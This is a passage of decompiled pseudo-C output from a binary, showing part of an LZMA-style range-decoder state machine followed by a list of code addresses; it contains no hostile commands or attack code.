                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L100:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t335 = __ebp - 0x70;
                                                											 *_t335 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t335;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L102;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L110:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t366 = __ebp - 0x70;
                                                											 *_t366 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t366;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L112;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											L132:
                                                											 *(_t612 - 0x54) = _t605;
                                                											goto L133;
                                                										case 0x12:
                                                											goto L0;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												goto L144;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											goto L130;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											L140:
                                                											 *(_t612 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L121;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											goto L145;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
                                                											goto L149;
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L120:
                                                												_t394 = __ebp - 0x2c;
                                                												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t394;
                                                												L121:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t401 = __ebp - 0x60;
                                                												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t401;
                                                												goto L124;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L103:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L109:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L113:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t392 = __ebp - 0x2c;
                                                														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t392;
                                                														goto L120;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L112:
                                                														_t369 = __ebp - 0x48;
                                                														 *_t369 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t369;
                                                														goto L113;
                                                													} else {
                                                														goto L110;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L102:
                                                													_t339 = __ebp - 0x48;
                                                													 *_t339 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t339;
                                                													goto L103;
                                                												} else {
                                                													goto L100;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L109;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L80;
                                                										case 0x1b:
                                                											L76:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t275 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t275;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t284 = __ebp - 0x64;
                                                											 *_t284 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t284;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L80:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L81;
                                                										case 0x1c:
                                                											while(1) {
                                                												L124:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t415 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t415;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t415;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L81:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											L170:
                                                											_push(0x22);
                                                											_pop(_t567);
                                                											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                											_t535 = 0;
                                                											L172:
                                                											return _t535;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                						__eax =  *(__ebp - 0x50);
                                                						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                						__eax =  *(__ebp - 0x58);
                                                						__esi = __edx + __eax;
                                                						 *(__ebp - 0x54) = __esi;
                                                						__ax =  *__esi;
                                                						__edi = __ax & 0x0000ffff;
                                                						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                						if( *(__ebp - 0xc) >= __ecx) {
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                							__cx = __ax;
                                                							__cx = __ax >> 5;
                                                							__eax = __eax - __ecx;
                                                							__edx = __edx + 1;
                                                							 *__esi = __ax;
                                                							 *(__ebp - 0x50) = __edx;
                                                						} else {
                                                							 *(__ebp - 0x10) = __ecx;
                                                							0x800 = 0x800 - __edi;
                                                							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                							 *__esi = __cx;
                                                						}
                                                						if( *(__ebp - 0x10) >= 0x1000000) {
                                                							goto L148;
                                                						} else {
                                                							goto L146;
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}








                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x004065ac
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
